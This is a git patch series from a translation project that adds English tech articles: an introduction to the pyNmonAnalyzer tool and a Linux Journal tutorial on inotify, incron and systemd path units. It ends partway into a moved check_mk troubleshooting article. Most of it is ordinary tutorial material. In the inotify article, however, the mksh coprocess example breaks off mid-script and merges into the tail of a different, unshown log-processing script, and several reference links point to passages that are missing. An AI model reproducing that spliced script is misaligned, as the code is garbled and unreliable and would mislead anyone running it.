From a641eb42d0e7244cb4449d3813838f0e0be3a172 Mon Sep 17 00:00:00 2001
From: darksun
Date: Fri, 12 Jan 2018 22:23:06 +0800
Subject: [PATCH 276/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Python=20Nmon=20A?=
=?UTF-8?q?nalyzer:=20moving=20away=20from=20excel=20macros?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...Analyzer- moving away from excel macros.md | 101 ++++++++++++++++++
1 file changed, 101 insertions(+)
create mode 100644 sources/tech/20121211 Python Nmon Analyzer- moving away from excel macros.md
diff --git a/sources/tech/20121211 Python Nmon Analyzer- moving away from excel macros.md b/sources/tech/20121211 Python Nmon Analyzer- moving away from excel macros.md
new file mode 100644
index 0000000000..3591e379d5
--- /dev/null
+++ b/sources/tech/20121211 Python Nmon Analyzer- moving away from excel macros.md
@@ -0,0 +1,101 @@
+translating by lujun9972
+Python Nmon Analyzer: moving away from excel macros
+======
+[Nigel's monitor][1], dubbed "Nmon", is a fantastic tool for monitoring, recording and analyzing a Linux/*nix system's performance over time. Nmon was originally developed by IBM and Open Sourced in the summer of 2009. By now Nmon is available on just about every linux platfrom and architecture. It provides a great real-time command line visualization of current system statistics, such as CPU, RAM, Network and Disk I/O. However, Nmon's greatest feature is the capability to record system performance snapshots over time.
+For example: `nmon -f -s 1`.
+![nmon CPU and Disk utilization][2]
+This will create a log file starting of with some system metadata(Section AAA - BBBV), followed by timed snapshots of all monitored system attributes, such as CPU and Memory usage. This produces a file that is hard to directly interpret with a spreadsheet application, hence the birth of the [Nmon_Analyzer][3] excel macro. This tool is great, if you have access to Windows/Mac with Microsoft Office installed. If not there is also the Nmon2rrd tool, which generates RRD input files to generate your graphs. This is a very rigid approach and slightly painful. Now to provide a more flexible tool, I am introducing the pyNmonAnalyzer, which aims to provide a customization solution for generating organized CSV files and simple HTML reports with [matplotlib][4] based graphs.
+
+### Getting Started:
+
+System requirements:
+As the name indicates you will need python. Additionally pyNmonAnalyzer depends on matplotlib and numpy. If you are on a debian-derivative system these are the packages you'll need to install:
+```
+$> sudo apt-get install python-numpy python-matplotlib
+
+```
+
+##### Getting pyNmonAnalyzer:
+
+Either clone the git repository:
+```
+$> git clone git@github.com:madmaze/pyNmonAnalyzer.git
+
+```
+
+or
+
+Download the current release here: [pyNmonAnalyzer-0.1.zip][5]
+
+Next we need an an Nmon file, if you do not already have one, either use the example provided in the release or record a sample: `nmon -F test.nmon -s 1 -c 120`, this will record 120 snapshots at 1 second intervals to test.nmon.
+
+Lets have a look at the basic help output:
+```
+$> ./pyNmonAnalyzer.py -h
+usage: pyNmonAnalyzer.py [-h] [-x] [-d] [-o OUTDIR] [-c] [-b] [-r CONFFNAME]
+ input_file
+
+nmonParser converts Nmon monitor files into time-sorted
+CSV/Spreadsheets for easier analysis, without the use of the
+MS Excel Macro. Also included is an option to build an HTML
+report with graphs, which is configured through report.config.
+
+positional arguments:
+ input_file Input NMON file
+
+optional arguments:
+ -h, --help show this help message and exit
+ -x, --overwrite overwrite existing results (Default: False)
+ -d, --debug debug? (Default: False)
+ -o OUTDIR, --output OUTDIR
+ Output dir for CSV (Default: ./data/)
+ -c, --csv CSV output? (Default: False)
+ -b, --buildReport report output? (Default: False)
+ -r CONFFNAME, --reportConfig CONFFNAME
+ Report config file, if none exists: we will write the
+ default config file out (Default: ./report.config)
+
+```
+
+There are 2 main options of using this tool
+
+ 1. Turn the nmon file into a set of separate CSV file
+ 2. Generate an HTML report with matplotlib graphs
+
+
+
+The following command does both:
+```
+$> ./pyNmonAnalyzer.py -c -b test.nmon
+
+```
+
+This will create a directory called ./data in which you will find a folder of CSV files ("./data/csv/"), a folder of PNG graphs ("./data/img/") and an HTML report ("./data/report.html").
+
+By default the HTML report will include graphs for CPU, Disk Busy, Memory utilization and Network transfers. This is all defined in a self explanitory configuration file, "report.config". At the moment this is not yet very flexible as CPU and MEM are not configurable besides on or off, but one of the next steps will be to refine the plotting approach and to expose more flexibility with which graphs plot which data points.
+
+### Report Example:
+
+[![pyNmonAnalyzer Graph output][6]
+**Click to see the full Report**][7]
+
+Currently these reports are very bare bones and only prints out basic labeled graphs, but development is on-going. Currently in development is a wizard that will make adjusting the configurations easier. Please do let me know if you have any suggestions, find any bugs or have feature requests.
+
+--------------------------------------------------------------------------------
+
+via: https://matthiaslee.com/python-nmon-analyzer-moving-away-from-excel-macros/
+
+作者:[Matthias Lee][a]
+译者:[lujun9972](https://github.com/lujun9972)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://matthiaslee.com/
+[1]:http://nmon.sourceforge.net/
+[2]:https://matthiaslee.com//content/images/2015/06/nmon_cpudisk.png
+[3]:http://www.ibm.com/developerworks/wikis/display/WikiPtype/nmonanalyser
+[4]:http://matplotlib.org/
+[5]:https://github.com/madmaze/pyNmonAnalyzer/blob/master/release/pyNmonAnalyzer-0.1.zip?raw=true
+[6]:https://matthiaslee.com//content/images/2017/04/teaser-short_0.png (pyNmonAnalyzer Graph output)
+[7]:http://matthiaslee.com/pub/pyNmonAnalyzer/data/report.html
From 21c32814a3e45a41fe179179946885608981e7b7 Mon Sep 17 00:00:00 2001
From: darksun
Date: Fri, 12 Jan 2018 22:38:51 +0800
Subject: [PATCH 277/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Linux=20Filesyste?=
=?UTF-8?q?m=20Events=20with=20inotify?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...08 Linux Filesystem Events with inotify.md | 789 ++++++++++++++++++
1 file changed, 789 insertions(+)
create mode 100644 sources/tech/20180108 Linux Filesystem Events with inotify.md
diff --git a/sources/tech/20180108 Linux Filesystem Events with inotify.md b/sources/tech/20180108 Linux Filesystem Events with inotify.md
new file mode 100644
index 0000000000..5e35f06ea8
--- /dev/null
+++ b/sources/tech/20180108 Linux Filesystem Events with inotify.md
@@ -0,0 +1,789 @@
+translating by lujun9972
+Linux Filesystem Events with inotify
+======
+
+Triggering scripts with incron and systemd.
+
+It is, at times, important to know when things change in the Linux OS. The uses to which systems are placed often include high-priority data that must be processed as soon as it is seen. The conventional method of finding and processing new file data is to poll for it, usually with cron. This is inefficient, and it can tax performance unreasonably if too many polling events are forked too often.
+
+Linux has an efficient method for alerting user-space processes to changes impacting files of interest. The inotify Linux system calls were first discussed here in Linux Journal in a [2005 article by Robert Love][6] who primarily addressed the behavior of the new features from the perspective of C.
+
+However, there also are stable shell-level utilities and new classes of monitoring dæmons for registering filesystem watches and reporting events. Linux installations using systemd also can access basic inotify functionality with path units. The inotify interface does have limitations—it can't monitor remote, network-mounted filesystems (that is, NFS); it does not report the userid involved in the event; it does not work with /proc or other pseudo-filesystems; and mmap() operations do not trigger it, among other concerns. Even with these limitations, it is a tremendously useful feature.
+
+This article completes the work begun by Love and gives everyone who can write a Bourne shell script or set a crontab the ability to react to filesystem changes.
+
+### The inotifywait Utility
+
+Working under Oracle Linux 7 (or similar versions of Red Hat/CentOS/Scientific Linux), the inotify shell tools are not installed by default, but you can load them with yum:
+
+```
+
+ # yum install inotify-tools
+Loaded plugins: langpacks, ulninfo
+ol7_UEKR4 | 1.2 kB 00:00
+ol7_latest | 1.4 kB 00:00
+Resolving Dependencies
+--> Running transaction check
+---> Package inotify-tools.x86_64 0:3.14-8.el7 will be installed
+--> Finished Dependency Resolution
+
+Dependencies Resolved
+
+==============================================================
+Package Arch Version Repository Size
+==============================================================
+Installing:
+inotify-tools x86_64 3.14-8.el7 ol7_latest 50 k
+
+Transaction Summary
+==============================================================
+Install 1 Package
+
+Total download size: 50 k
+Installed size: 111 k
+Is this ok [y/d/N]: y
+Downloading packages:
+inotify-tools-3.14-8.el7.x86_64.rpm | 50 kB 00:00
+Running transaction check
+Running transaction test
+Transaction test succeeded
+Running transaction
+Warning: RPMDB altered outside of yum.
+ Installing : inotify-tools-3.14-8.el7.x86_64 1/1
+ Verifying : inotify-tools-3.14-8.el7.x86_64 1/1
+
+Installed:
+ inotify-tools.x86_64 0:3.14-8.el7
+
+Complete!
+
+```
+
+The package will include two utilities (inotifywait and inotifywatch), documentation and a number of libraries. The inotifywait program is of primary interest.
+
+Some derivatives of Red Hat 7 may not include inotify in their base repositories. If you find it missing, you can obtain it from [Fedora's EPEL repository][7], either by downloading the inotify RPM for manual installation or adding the EPEL repository to yum.
+
+Any user on the system who can launch a shell may register watches—no special privileges are required to use the interface. This example watches the /tmp directory:
+
+```
+
+$ inotifywait -m /tmp
+Setting up watches.
+Watches established.
+
+```
+
+If another session on the system performs a few operations on the files in /tmp:
+
+```
+
+$ touch /tmp/hello
+$ cp /etc/passwd /tmp
+$ rm /tmp/passwd
+$ touch /tmp/goodbye
+$ rm /tmp/hello /tmp/goodbye
+
+```
+
+those changes are immediately visible to the user running inotifywait:
+
+```
+
+/tmp/ CREATE hello
+/tmp/ OPEN hello
+/tmp/ ATTRIB hello
+/tmp/ CLOSE_WRITE,CLOSE hello
+/tmp/ CREATE passwd
+/tmp/ OPEN passwd
+/tmp/ MODIFY passwd
+/tmp/ CLOSE_WRITE,CLOSE passwd
+/tmp/ DELETE passwd
+/tmp/ CREATE goodbye
+/tmp/ OPEN goodbye
+/tmp/ ATTRIB goodbye
+/tmp/ CLOSE_WRITE,CLOSE goodbye
+/tmp/ DELETE hello
+/tmp/ DELETE goodbye
+
+```
+
+A few relevant sections of the manual page explain what is happening:
+
+```
+
+$ man inotifywait | col -b | sed -n '/diagnostic/,/helpful/p'
+ inotifywait will output diagnostic information on standard error and
+ event information on standard output. The event output can be config-
+ ured, but by default it consists of lines of the following form:
+
+ watched_filename EVENT_NAMES event_filename
+
+ watched_filename
+ is the name of the file on which the event occurred. If the
+ file is a directory, a trailing slash is output.
+
+ EVENT_NAMES
+ are the names of the inotify events which occurred, separated by
+ commas.
+
+ event_filename
+ is output only when the event occurred on a directory, and in
+ this case the name of the file within the directory which caused
+ this event is output.
+
+ By default, any special characters in filenames are not escaped
+ in any way. This can make the output of inotifywait difficult
+ to parse in awk scripts or similar. The --csv and --format
+ options will be helpful in this case.
+
+```
+
+It also is possible to filter the output by registering particular events of interest with the -e option, the list of which is shown here:
+
+| access | create | move_self |
+|========|========|===========|
+| attrib | delete | moved_to |
+| close_write | delete_self | moved_from |
+| close_nowrite | modify | open |
+| close | move | unmount |
+
+A common application is testing for the arrival of new files. Since inotify must be given the name of an existing filesystem object to watch, the directory containing the new files is provided. A trigger of interest is also easy to provide—new files should be complete and ready for processing when the close_write trigger fires. Below is an example script to watch for these events:
+
+```
+
+#!/bin/sh
+unset IFS # default of space, tab and nl
+ # Wait for filesystem events
+inotifywait -m -e close_write \
+ /tmp /var/tmp /home/oracle/arch-orcl/ |
+while read dir op file
+do [[ "${dir}" == '/tmp/' && "${file}" == *.txt ]] &&
+ echo "Import job should start on $file ($dir $op)."
+
+ [[ "${dir}" == '/var/tmp/' && "${file}" == CLOSE_WEEK*.txt ]] &&
+ echo Weekly backup is ready.
+
+ [[ "${dir}" == '/home/oracle/arch-orcl/' && "${file}" == *.ARC ]]
+&&
+ su - oracle -c 'ORACLE_SID=orcl ~oracle/bin/log_shipper' &
+
+ [[ "${dir}" == '/tmp/' && "${file}" == SHUT ]] && break
+
+ ((step+=1))
+done
+
+echo We processed $step events.
+
+```
+
+There are a few problems with the script as presented—of all the available shells on Linux, only ksh93 (that is, the AT&T Korn shell) will report the "step" variable correctly at the end of the script. All the other shells will report this variable as null.
+
+The reason for this behavior can be found in a brief explanation on the manual page for Bash: "Each command in a pipeline is executed as a separate process (i.e., in a subshell)." The MirBSD clone of the Korn shell has a slightly longer explanation:
+
+```
+
+# man mksh | col -b | sed -n '/The parts/,/do so/p'
+ The parts of a pipeline, like below, are executed in subshells. Thus,
+ variable assignments inside them fail. Use co-processes instead.
+
+ foo | bar | read baz # will not change $baz
+ foo | bar |& read -p baz # will, however, do so
+
+```
+
+And, the pdksh documentation in Oracle Linux 5 (from which MirBSD mksh emerged) has several more mentions of the subject:
+
+```
+
+General features of at&t ksh88 that are not (yet) in pdksh:
+ - the last command of a pipeline is not run in the parent shell
+ - `echo foo | read bar; echo $bar' prints foo in at&t ksh, nothing
+ in pdksh (ie, the read is done in a separate process in pdksh).
+ - in pdksh, if the last command of a pipeline is a shell builtin, it
+ is not executed in the parent shell, so "echo a b | read foo bar"
+ does not set foo and bar in the parent shell (at&t ksh will).
+ This may get fixed in the future, but it may take a while.
+
+$ man pdksh | col -b | sed -n '/BTW, the/,/aware/p'
+ BTW, the most frequently reported bug is
+ echo hi | read a; echo $a # Does not print hi
+ I'm aware of this and there is no need to report it.
+
+```
+
+This behavior is easy enough to demonstrate—running the script above with the default bash shell and providing a sequence of example events:
+
+```
+
+$ cp /etc/passwd /tmp/newdata.txt
+$ cp /etc/group /var/tmp/CLOSE_WEEK20170407.txt
+$ cp /etc/passwd /tmp/SHUT
+
+```
+
+gives the following script output:
+
+```
+
+# ./inotify.sh
+Setting up watches.
+Watches established.
+Import job should start on newdata.txt (/tmp/ CLOSE_WRITE,CLOSE).
+Weekly backup is ready.
+We processed events.
+
+```
+
+Examining the process list while the script is running, you'll also see two shells, one forked for the control structure:
+
+```
+
+$ function pps { typeset a IFS=\| ; ps ax | while read a
+do case $a in *$1*|+([!0-9])) echo $a;; esac; done }
+
+$ pps inot
+ PID TTY STAT TIME COMMAND
+ 3394 pts/1 S+ 0:00 /bin/sh ./inotify.sh
+ 3395 pts/1 S+ 0:00 inotifywait -m -e close_write /tmp /var/tmp
+ 3396 pts/1 S+ 0:00 /bin/sh ./inotify.sh
+
+```
+
+As it was manipulated in a subshell, the "step" variable above was null when control flow reached the echo. Switching this from #/bin/sh to #/bin/ksh93 will correct the problem, and only one shell process will be seen:
+
+```
+
+# ./inotify.ksh93
+Setting up watches.
+Watches established.
+Import job should start on newdata.txt (/tmp/ CLOSE_WRITE,CLOSE).
+Weekly backup is ready.
+We processed 2 events.
+
+$ pps inot
+ PID TTY STAT TIME COMMAND
+ 3583 pts/1 S+ 0:00 /bin/ksh93 ./inotify.sh
+ 3584 pts/1 S+ 0:00 inotifywait -m -e close_write /tmp /var/tmp
+
+```
+
+Although ksh93 behaves properly and in general handles scripts far more gracefully than all of the other Linux shells, it is rather large:
+
+```
+
+$ ll /bin/[bkm]+([aksh93]) /etc/alternatives/ksh
+-rwxr-xr-x. 1 root root 960456 Dec 6 11:11 /bin/bash
+lrwxrwxrwx. 1 root root 21 Apr 3 21:01 /bin/ksh ->
+ /etc/alternatives/ksh
+-rwxr-xr-x. 1 root root 1518944 Aug 31 2016 /bin/ksh93
+-rwxr-xr-x. 1 root root 296208 May 3 2014 /bin/mksh
+lrwxrwxrwx. 1 root root 10 Apr 3 21:01 /etc/alternatives/ksh ->
+ /bin/ksh93
+
+```
+
+The mksh binary is the smallest of the Bourne implementations above (some of these shells may be missing on your system, but you can install them with yum). For a long-term monitoring process, mksh is likely the best choice for reducing both processing and memory footprint, and it does not launch multiple copies of itself when idle assuming that a coprocess is used. Converting the script to use a Korn coprocess that is friendly to mksh is not difficult:
+
+```
+
+#!/bin/mksh
+unset IFS # default of space, tab and nl
+ # Wait for filesystem events
+inotifywait -m -e close_write \
+ /tmp/ /var/tmp/ /home/oracle/arch-orcl/ \
+ 2 ~oracle/.curlog-$ORACLE_SID
+
+) 9>~oracle/.processing_logs-$ORACLE_SID
+
+```
+
+The above script can be executed manually for testing even while the inotify handler is running, as the flock protects it.
+
+A standby server, or a DataGuard server in primitive standby mode, can apply the archived logs at regular intervals. The script below forces a 12-hour delay in log application for the recovery of dropped or damaged objects, so inotify cannot be easily used in this case—cron is a more reasonable approach for delayed file processing, and a run every 20 minutes will keep the standby at the desired recovery point:
+
+```
+
+# cat ~oracle/archutils/delay-lock.sh
+
+#!/bin/ksh93
+
+(
+ flock -n 9 || exit 1 # Critical section-only one process.
+
+ WINDOW=43200 # 12 hours
+
+ LOG_DEST=~oracle/arch-$ORACLE_SID
+
+ OLDLOG_DEST=$LOG_DEST-applied
+
+ function fage { print $(( $(date +%s) - $(stat -c %Y "$1") ))
+ } # File age in seconds - Requires GNU extended date & stat
+
+ cd $LOG_DEST
+
+ of=$(ls -t | tail -1) # Oldest file in directory
+
+ [[ -z "$of" || $(fage "$of") -lt $WINDOW ]] && exit
+
+ for x in $(ls -rt) # Order by ascending file mtime
+ do if [[ $(fage "$x") -ge $WINDOW ]]
+ then y=$(basename $x .lz) # lzip compression is optional
+
+ [[ "$y" != "$x" ]] && /usr/local/bin/lzip -dkq "$x"
+
+ $ORACLE_HOME/bin/sqlplus '/ as sysdba' > /dev/null 2>&1 <<-EOF
+ recover standby database;
+ $LOG_DEST/$y
+ cancel
+ quit
+ EOF
+
+ [[ "$y" != "$x" ]] && rm "$y"
+
+ mv "$x" $OLDLOG_DEST
+ fi
+
+ done
+) 9> ~oracle/.recovering-$ORACLE_SID
+
+```
+
+I've covered these specific examples here because they introduce tools to control concurrency, which is a common issue when using inotify, and they advance a few features that increase reliability and minimize storage requirements. Hopefully enthusiastic readers will introduce many improvements to these approaches.
+
+### The incron System
+
+Lukas Jelinek is the author of the incron package that allows users to specify tables of inotify events that are executed by the master incrond process. Despite the reference to "cron", the package does not schedule events at regular intervals—it is a tool for filesystem events, and the cron reference is slightly misleading.
+
+The incron package is available from EPEL. If you have installed the repository, you can load it with yum:
+
+```
+
+# yum install incron
+Loaded plugins: langpacks, ulninfo
+Resolving Dependencies
+--> Running transaction check
+---> Package incron.x86_64 0:0.5.10-8.el7 will be installed
+--> Finished Dependency Resolution
+
+Dependencies Resolved
+
+=================================================================
+ Package Arch Version Repository Size
+=================================================================
+Installing:
+ incron x86_64 0.5.10-8.el7 epel 92 k
+
+Transaction Summary
+==================================================================
+Install 1 Package
+
+Total download size: 92 k
+Installed size: 249 k
+Is this ok [y/d/N]: y
+Downloading packages:
+incron-0.5.10-8.el7.x86_64.rpm | 92 kB 00:01
+Running transaction check
+Running transaction test
+Transaction test succeeded
+Running transaction
+ Installing : incron-0.5.10-8.el7.x86_64 1/1
+ Verifying : incron-0.5.10-8.el7.x86_64 1/1
+
+Installed:
+ incron.x86_64 0:0.5.10-8.el7
+
+Complete!
+
+```
+
+On a systemd distribution with the appropriate service units, you can start and enable incron at boot with the following commands:
+
+```
+
+# systemctl start incrond
+# systemctl enable incrond
+Created symlink from
+ /etc/systemd/system/multi-user.target.wants/incrond.service
+to /usr/lib/systemd/system/incrond.service.
+
+```
+
+In the default configuration, any user can establish incron schedules. The incrontab format uses three fields:
+
+```
+path>
+```
+
+Below is an example entry that was set with the -e option:
+
+```
+
+$ incrontab -e #vi session follows
+
+$ incrontab -l
+/tmp/ IN_ALL_EVENTS /home/luser/myincron.sh $@ $% $#
+
+```
+
+You can record a simple script and mark it with execute permission:
+
+```
+
+$ cat myincron.sh
+#!/bin/sh
+
+echo -e "path: $1 op: $2 \t file: $3" >> ~/op
+
+$ chmod 755 myincron.sh
+
+```
+
+Then, if you repeat the original /tmp file manipulations at the start of this article, the script will record the following output:
+
+```
+
+$ cat ~/op
+
+path: /tmp/ op: IN_ATTRIB file: hello
+path: /tmp/ op: IN_CREATE file: hello
+path: /tmp/ op: IN_OPEN file: hello
+path: /tmp/ op: IN_CLOSE_WRITE file: hello
+path: /tmp/ op: IN_OPEN file: passwd
+path: /tmp/ op: IN_CLOSE_WRITE file: passwd
+path: /tmp/ op: IN_MODIFY file: passwd
+path: /tmp/ op: IN_CREATE file: passwd
+path: /tmp/ op: IN_DELETE file: passwd
+path: /tmp/ op: IN_CREATE file: goodbye
+path: /tmp/ op: IN_ATTRIB file: goodbye
+path: /tmp/ op: IN_OPEN file: goodbye
+path: /tmp/ op: IN_CLOSE_WRITE file: goodbye
+path: /tmp/ op: IN_DELETE file: hello
+path: /tmp/ op: IN_DELETE file: goodbye
+
+```
+
+While the IN_CLOSE_WRITE event on a directory object is usually of greatest interest, most of the standard inotify events are available within incron, which also offers several unique amalgams:
+
+```
+
+$ man 5 incrontab | col -b | sed -n '/EVENT SYMBOLS/,/child process/p'
+
+EVENT SYMBOLS
+
+These basic event mask symbols are defined:
+
+IN_ACCESS File was accessed (read) (*)
+IN_ATTRIB Metadata changed (permissions, timestamps, extended
+ attributes, etc.) (*)
+IN_CLOSE_WRITE File opened for writing was closed (*)
+IN_CLOSE_NOWRITE File not opened for writing was closed (*)
+IN_CREATE File/directory created in watched directory (*)
+IN_DELETE File/directory deleted from watched directory (*)
+IN_DELETE_SELF Watched file/directory was itself deleted
+IN_MODIFY File was modified (*)
+IN_MOVE_SELF Watched file/directory was itself moved
+IN_MOVED_FROM File moved out of watched directory (*)
+IN_MOVED_TO File moved into watched directory (*)
+IN_OPEN File was opened (*)
+
+When monitoring a directory, the events marked with an asterisk (*)
+above can occur for files in the directory, in which case the name
+field in the returned event data identifies the name of the file within
+the directory.
+
+The IN_ALL_EVENTS symbol is defined as a bit mask of all of the above
+events. Two additional convenience symbols are IN_MOVE, which is a com-
+bination of IN_MOVED_FROM and IN_MOVED_TO, and IN_CLOSE, which combines
+IN_CLOSE_WRITE and IN_CLOSE_NOWRITE.
+
+The following further symbols can be specified in the mask:
+
+IN_DONT_FOLLOW Don't dereference pathname if it is a symbolic link
+IN_ONESHOT Monitor pathname for only one event
+IN_ONLYDIR Only watch pathname if it is a directory
+
+Additionally, there is a symbol which doesn't appear in the inotify sym-
+bol set. It is IN_NO_LOOP. This symbol disables monitoring events until
+the current one is completely handled (until its child process exits).
+
+```
+
+The incron system likely presents the most comprehensive interface to inotify of all the tools researched and listed here. Additional configuration options can be set in /etc/incron.conf to tweak incron's behavior for those that require a non-standard configuration.
+
+### Path Units under systemd
+
+When your Linux installation is running systemd as PID 1, limited inotify functionality is available through "path units" as is discussed in a lighthearted [article by Paul Brown][8] at OCS-Mag.
+
+The relevant manual page has useful information on the subject:
+
+```
+
+$ man systemd.path | col -b | sed -n '/Internally,/,/systems./p'
+
+Internally, path units use the inotify(7) API to monitor file systems.
+Due to that, it suffers by the same limitations as inotify, and for
+example cannot be used to monitor files or directories changed by other
+machines on remote NFS file systems.
+
+```
+
+Note that when a systemd path unit spawns a shell script, the $HOME and tilde (~) operator for the owner's home directory may not be defined. Using the tilde operator to reference another user's home directory (for example, ~nobody/) does work, even when applied to the self-same user running the script. The Oracle script above was explicit and did not reference ~ without specifying the target user, so I'm using it as an example here.
+
+Using inotify triggers with systemd path units requires two files. The first file specifies the filesystem location of interest:
+
+```
+
+$ cat /etc/systemd/system/oralog.path
+
+[Unit]
+Description=Oracle Archivelog Monitoring
+Documentation=http://docs.yourserver.com
+
+[Path]
+PathChanged=/home/oracle/arch-orcl/
+
+[Install]
+WantedBy=multi-user.target
+
+```
+
+The PathChanged parameter above roughly corresponds to the close-write event used in my previous direct inotify calls. The full collection of inotify events is not (currently) supported by systemd—it is limited to PathExists, PathChanged and PathModified, which are described in man systemd.path.
+
+The second file is a service unit describing a program to be executed. It must have the same name, but a different extension, as the path unit:
+
+```
+
+$ cat /etc/systemd/system/oralog.service
+
+[Unit]
+Description=Oracle Archivelog Monitoring
+Documentation=http://docs.yourserver.com
+
+[Service]
+Type=oneshot
+Environment=ORACLE_SID=orcl
+ExecStart=/bin/sh -c '/root/process_logs >> /tmp/plog.txt 2>&1'
+
+```
+
+The oneshot parameter above alerts systemd that the program that it forks is expected to exit and should not be respawned automatically—the restarts are limited to triggers from the path unit. The above service configuration will provide the best options for logging—divert them to /dev/null if they are not needed.
+
+Use systemctl start on the path unit to begin monitoring—a common error is using it on the service unit, which will directly run the handler only once. Enable the path unit if the monitoring should survive a reboot.
+
+Although this limited functionality may be enough for some casual uses of inotify, it is a shame that the full functionality of inotifywait and incron are not represented here. Perhaps it will come in time.
+
+### Conclusion
+
+Although the inotify tools are powerful, they do have limitations. To repeat them, inotify cannot monitor remote (NFS) filesystems; it cannot report the userid involved in a triggering event; it does not work with /proc or other pseudo-filesystems; mmap() operations do not trigger it; and the inotify queue can overflow resulting in lost events, among other concerns.
+
+Even with these weaknesses, the efficiency of inotify is superior to most other approaches for immediate notifications of filesystem activity. It also is quite flexible, and although the close-write directory trigger should suffice for most usage, it has ample tools for covering special use cases.
+
+In any event, it is productive to replace polling activity with inotify watches, and system administrators should be liberal in educating the user community that the classic crontab is not an appropriate place to check for new files. Recalcitrant users should be confined to Ultrix on a VAX until they develop sufficient appreciation for modern tools and approaches, which should result in more efficient Linux systems and happier administrators.
+
+### Sidenote: Archiving /etc/passwd
+
+Tracking changes to the password file involves many different types of inotify triggering events. The vipw utility commonly will make changes to a temporary file, then clobber the original with it. This can be seen when the inode number changes:
+
+```
+
+# ll -i /etc/passwd
+199720973 -rw-r--r-- 1 root root 3928 Jul 7 12:24 /etc/passwd
+
+# vipw
+[ make changes ]
+You are using shadow passwords on this system.
+Would you like to edit /etc/shadow now [y/n]? n
+
+# ll -i /etc/passwd
+203784208 -rw-r--r-- 1 root root 3956 Jul 7 12:24 /etc/passwd
+
+```
+
+The destruction and replacement of /etc/passwd even occurs with setuid binaries called by unprivileged users:
+
+```
+
+$ ll -i /etc/passwd
+203784196 -rw-r--r-- 1 root root 3928 Jun 29 14:55 /etc/passwd
+
+$ chsh
+Changing shell for fishecj.
+Password:
+New shell [/bin/bash]: /bin/csh
+Shell changed.
+
+$ ll -i /etc/passwd
+199720970 -rw-r--r-- 1 root root 3927 Jul 7 12:23 /etc/passwd
+
+```
+
+For this reason, all inotify triggering events should be considered when tracking this file. If there is concern with an inotify queue overflow (in which events are lost), then the OPEN, ACCESS and CLOSE_NOWRITE,CLOSE triggers likely can be immediately ignored.
+
+All other inotify events on /etc/passwd might run the following script to version the changes into an RCS archive and mail them to an administrator:
+
+```
+
+#!/bin/sh
+
+# This script tracks changes to the /etc/passwd file from inotify.
+# Uses RCS for archiving. Watch for UID zero.
+
+PWMAILS=Charlie.Root@openbsd.org
+
+TPDIR=~/track_passwd
+
+cd $TPDIR
+
+if diff -q /etc/passwd $TPDIR/passwd
+then exit # they are the same
+else sleep 5 # let passwd settle
+ diff /etc/passwd $TPDIR/passwd 2>&1 | # they are DIFFERENT
+ mail -s "/etc/passwd changes $(hostname -s)" "$PWMAILS"
+ cp -f /etc/passwd $TPDIR # copy for checkin
+
+# "SCCS, the source motel! Programs check in and never check out!"
+# -- Ken Thompson
+
+ rcs -q -l passwd # lock the archive
+ ci -q -m_ passwd # check in new ver
+ co -q passwd # drop the new copy
+fi > /dev/null 2>&1
+
+```
+
+Here is an example email from the script for the above chfn operation:
+
+```
+
+-----Original Message-----
+From: root [mailto:root@myhost.com]
+Sent: Thursday, July 06, 2017 2:35 PM
+To: Fisher, Charles J. ;
+Subject: /etc/passwd changes myhost
+
+57c57
+< fishecj:x:123:456:Fisher, Charles J.:/home/fishecj:/bin/bash
+---
+> fishecj:x:123:456:Fisher, Charles J.:/home/fishecj:/bin/csh
+
+```
+
+Further processing on the third column of /etc/passwd might detect UID zero (a root user) or other important user classes for emergency action. This might include a rollback of the file from RCS to /etc and/or SMS messages to security contacts.
+
+
+--------------------------------------------------------------------------------
+
+via: http://www.linuxjournal.com/content/linux-filesystem-events-inotify
+
+作者:[Charles Fisher][a]
+译者:[lujun9972](https://github.com/lujun9972)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:
+[1]:http://www.nongnu.org/lzip
+[2]:http://www.nongnu.org/lzip/xz_inadequate.html
+[3]:http://www.7-zip.org
+[4]:http://www.ncsl.org/research/telecommunications-and-information-technology/security-breach-notification-laws.aspx
+[5]:http://www.linuxjournal.com/content/flat-file-encryption-openssl-and-gpg
+[6]:http://www.linuxjournal.com/article/8478
+[7]:https://fedoraproject.org/wiki/EPEL
+[8]:http://www.ocsmag.com/2015/09/02/monitoring-file-access-for-dummies
From f38d737b359c9b5042531993df1e5afdf9baf743 Mon Sep 17 00:00:00 2001
From: darksun
Date: Fri, 12 Jan 2018 23:19:40 +0800
Subject: [PATCH 278/371] translate done: 20171017 check_mk error Cannot fetch
deployment URL via curl error.md
---
...not fetch deployment URL via curl error.md | 62 -------------------
...not fetch deployment URL via curl error.md | 61 ++++++++++++++++++
2 files changed, 61 insertions(+), 62 deletions(-)
delete mode 100644 sources/tech/20171017 check_mk error Cannot fetch deployment URL via curl error.md
create mode 100644 translated/tech/20171017 check_mk error Cannot fetch deployment URL via curl error.md
diff --git a/sources/tech/20171017 check_mk error Cannot fetch deployment URL via curl error.md b/sources/tech/20171017 check_mk error Cannot fetch deployment URL via curl error.md
deleted file mode 100644
index 245d424f1b..0000000000
--- a/sources/tech/20171017 check_mk error Cannot fetch deployment URL via curl error.md
+++ /dev/null
@@ -1,62 +0,0 @@
-translating by lujun9972
-check_mk error Cannot fetch deployment URL via curl error
-======
-Article explaining 'ERROR Cannot fetch deployment URL via curl: Couldn't resolve host. The given remote host was not resolved.' and how to resolve it.
-
-![ERROR Cannot fetch deployment URL via curl: Couldn't resolve host. The given remote host was not resolved.][1]
-
-check_mk is a utility which helps you configure your server to be monitored via [nagios monitoring tool][2]. While configuring one of the client I came across below error :
-
-`ERROR Cannot fetch deployment URL via curl: Couldn't resolve host. The given remote host was not resolved.`
-
-This error came after I tried to register client with monitoring server with below command :
-
-```
-root@kerneltalks# /usr/bin/cmk-update-agent register -s monitor.kerneltalks.com -i master -H `hostname` -p http -U omdadmin -S ASFKWEFUNSHEFKG -v
-```
-
-Here in this command -
-
-`-s` is monitoring server
-`-i` is Name of Check_MK site on that server
